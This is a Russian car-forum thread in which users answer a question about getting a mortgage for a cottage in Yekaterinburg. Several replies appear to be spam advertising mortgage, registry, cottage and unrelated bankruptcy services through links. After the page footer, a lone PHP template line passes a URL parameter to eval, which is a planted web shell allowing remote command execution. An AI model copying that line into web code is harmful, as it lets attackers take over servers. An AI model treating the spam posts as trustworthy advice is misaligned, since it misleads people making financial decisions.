+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя
Показано с 1 по 10 из 11

Тема: Дом в ипотеку


  1. #1
    Мимо проходил Masewrol is on a distinguished road Аватар для Masewrol
    Регистрация
    28.01.2019
    Откуда
    Россия
    Машина
    Gof 6
    Сообщений
    64

    Дом в ипотеку

    Хотим купить коттедж в Екатеринбурге, только в ипотеку. Мы уже выбрали подходящий дом, осталось дело за малым, найти банк, где можно будет оформить ипотеку. Подскажите, в каком банке самые выгодные условия?

  2. #2
    Мимо проходил Sertol is on a distinguished road Аватар для Sertol
    Регистрация
    05.04.2020
    Откуда
    Россия.
    Машина
    Гольф
    Сообщений
    45
    Это вам нужно самим проехаться по банкам. Так как не все банки дают ипотеку, поэтому придется консультироваться. И заодно сравнивать, где какие условия, и процентная ставка.

  3. #3
    Мимо проходил Larik is on a distinguished road Аватар для Larik
    Регистрация
    04.01.2019
    Откуда
    Россия.
    Машина
    Golf 4
    Сообщений
    65
    Без проблем можно купить коттедж в ипотеку. Если вы уже выбрали дом, и знаете его цену, то здесь, например, можете не только рассчитать ипотеку, но и выбрать банк с самыми выгодными для вас условиями https://zagorodka.pro/ipoteka/ . И заметьте, вам самим ничего не придется делать, специалисты все сделают сами, и быстро.

  4. #4
    Мимо проходил Nevron is on a distinguished road Аватар для Nevron
    Регистрация
    26.01.2019
    Откуда
    Россия.
    Машина
    GOLF R
    Сообщений
    56
    Я доверяю одному банку, и это Сбербанк. У меня там не только кредит, но и депозитный счет, и зарплатная карточка. Пока не было никаких проблем, я доволен их работой.

  5. #5
    Мимо проходил Doper is on a distinguished road Аватар для Doper
    Регистрация
    27.12.2018
    Откуда
    Россия
    Машина
    Volkswagen
    Сообщений
    71
    Я так понимаю, что дом вы покупаете на вторичном рынке. Если это так, то не спешите брать ипотеку, для начала вам лучше проверить эту недвижимость. Мало ли что, вдруг есть, какие-то обременения, выяснить, кто является владельцем, кто прописан…. А сделать это можно без проблем, например, здесь заказав выписку из ЕГРН https://kadastrovaya-karta-onlajn.ru/ . Обезопасьте себя, а потом уже оформляйте ипотеку.

  6. #6
    GTI-Racing Semen Leonidovich is on a distinguished road Аватар для Semen Leonidovich
    Регистрация
    05.04.2020
    Откуда
    Мск
    Машина
    Бричка
    Сообщений
    249
    Можете вот здесь почитать как списать долги и какие документы для этого нужны. Процедура не дешевая и по времени может до года занять, но если у вас большая задолженность, то это самый лучший вариант. У моей знакомой долгов было больше миллиона, в итоге через 1,5 года она стала официально банкротом и теперь спокойно живет, никому не должна и может перемещаться по всему миру https://msk-bfl.cvd.ru/

  7. #7
    Мимо проходил Xicheliav is on a distinguished road Аватар для Xicheliav
    Регистрация
    24.12.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    4
    Мы с семьей тоже думаем покупать коттедж в следующем году, только в рассрочку на индивидуальных условиях. Дом от застройщиков vsekottedzhi.com.ua/complex/kg-eurovillage я считаю, что если покупать недвижимость, то только первичную
    Кто любит за высокие нравственные достоинства, тот остается верен всю жизнь, потому что он привязывается к чему-то постоянному.

  8. #8
    Мимо проходил Люкс is on a distinguished road Аватар для Люкс
    Регистрация
    20.02.2021
    Сообщений
    1
    Можно попробовать дать заявки в несколько банков и выбрать то, что вам подходит

  9. #9
    Мимо проходил Dmitrii Kniazev is on a distinguished road Аватар для Dmitrii Kniazev
    Регистрация
    10.03.2022
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    4
    Все зависит от исходных данных: есть ли у вас основания для снижения ставки (молодая семья и тп), какой первоначальны взнос, сколько готовы платить в месяц и тп
    Лучше написать в каждый банк с запросом рассчитать условия кредитования под конкретно вашу ситуацию

  10. #10
    GTI-Racing Felhaghma is on a distinguished road Аватар для Felhaghma
    Регистрация
    23.10.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    482
    Молодым людям всегда трудно, так как нужно подумать о вопросах покупки жилья. Мне повезло, что приятельница предоставила информацию на сайте https://www.bspb.ru/retail/mortgage ПАО “Банк “Санкт-Петербург”, в котором прочитала данные о программе льготная программа для IT-специалистов. У них все расписано детально, поэтому не составило трудностей все понять.

+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}